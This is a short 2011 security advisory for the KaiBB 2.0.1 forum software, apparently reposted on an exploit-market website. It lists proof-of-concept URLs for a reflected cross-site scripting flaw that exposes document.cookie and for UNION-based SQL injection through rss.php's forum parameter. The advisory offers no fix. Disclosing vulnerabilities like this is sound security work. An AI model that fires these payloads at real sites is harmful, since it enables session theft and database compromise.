[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KaiBB 2.0.1 SQL Injection vulnerability

Author
Stefan Schurtz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16987
Category
web applications
Date add
09-10-2011
Platform
php
Author:                     Stefan Schurtz
Affected Software:      Successfully tested on KaiBB 2.0.1
Vendor URL:             http://code.google.com/p/kaibb/
Vendor Status:          informed
CVE-ID:                     -
 
==========================
Vulnerability Description:
==========================
 
KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities
 
==================
Technical Details:
==================
 
Cross-site Scripting
 
http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
 
SQL Injection
 
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
 
=========
Solution:
=========
 
-
 
====================
Disclosure Timeline:
====================
 
08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
 
========
Credits:
========
 
Vulnerability found and advisory written by Stefan Schurtz.



#  0day.today [2024-07-07]  #